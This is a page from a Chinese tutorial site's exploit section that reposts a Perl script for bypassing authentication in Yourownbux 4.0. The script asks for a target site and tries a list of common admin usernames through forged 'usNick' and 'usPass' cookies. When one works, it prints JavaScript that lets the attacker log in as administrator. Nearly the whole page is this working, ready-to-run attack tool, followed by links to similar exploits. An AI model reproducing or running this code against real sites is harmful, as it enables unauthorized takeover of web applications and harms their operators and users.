手机
当前位置:查字典教程网 >网络安全 >Exploit >Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit
Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useHTTP::Request;#-------------------...

#!/usr/bin/perl

use LWP::UserAgent;

use HTTP::Request;

# ------------------------------------------------------------------------------------------------- -#

# Yourownbux v4.0 ------------------------------------------------------------ --

# Cookie Modification Exploit -----------------------------------------------------------------

# Discovered By: Tec-n0x | 04/9/2008 --------------------------------------------------------

#

# Dropsec.com

#

# Modify The Line 39, Adding More User's that can be the admin username------------

#

# Gr33tz: Celciuz, OzX, N.O.X, MurdeR, Syst3m-c0d3r && All Friends --

# ------------------------------------------------------------- ----------------------------------------#

system("clear");

print "

# Yourownbux v4.0 Cookie Modification Exploitn# Discovered By: Tec-n0xnn# Tec-n0x [ at ] hotmail [ dot ] com > DropSec.com

nn";

print "Target [ Example: www.sitedemo.com ] :n> ";

$target = <STDIN>;

chop($target);

if($target =~ m/www.(.*).(.*)/) {

$other = $1;

check1($target);

} else {

print "nInvalid Target.";

exit();

}

sub explote {

@tryusers = ("admina", "administrator", "admins", "admin", "master", "manager", "root", "$other");

# Add Posible Users.

$check = shift;

foreach $user (@tryusers) {

$pass = "Tec-n0x";

print "ntTrying > $usern";

$browser = LWP::UserAgent->new();

$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");

$browser->default_header("Cookie" => "usNick=$user; usPass=$pass");

$get = HTTP::Request->new(GET => $check);

$resp = $browser->request($get);

$content = $resp->content();

@code = split("n",$content);

foreach $checka (@code) {

if($checka =~ m/Emails|Served|Workload|Overview/) {

system("clear");

print "Succesfull EXPLOTED ...!!nnValid Username: $usernnGo to: $checknn And Put this on your browser:";

$vd = "javascript:document.cookie = "usNick=$user; path=/";";

$vda = "javascript:document.cookie = "usPass=Dropsec.com; path=/";";

print "

------------------------------------

$vdn $vda

------------------------------------

";

$yes = 1;

exit();

}

}

}

if($yes != 1) {

print "nnnExploit Failed";

exit();

}

}

sub check1 {

$target = shift;

$check = "http://$target/admin/index.php";

$browser = LWP::UserAgent->new();

$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");

$get = HTTP::Request->new(GET => $check);

$resp = $browser->request($get);

$content = $resp->content();

@code = split("n",$content);

foreach $checka (@code) {

if($checka =~ m/You must login as administrator to access this page/) {

print "Check 1 [ OK ]n";

$success = 1;

explote($check);

}

}

if($sucess != 1) {

print "Failed";

exit();

}

}

【Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit】相关文章:

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

Dreampics Builder (page) Remote SQL Injection Vulnerability

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

Joomla Component EZ Store Remote Blind SQL Injection Exploit

Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit

精品推荐
分类导航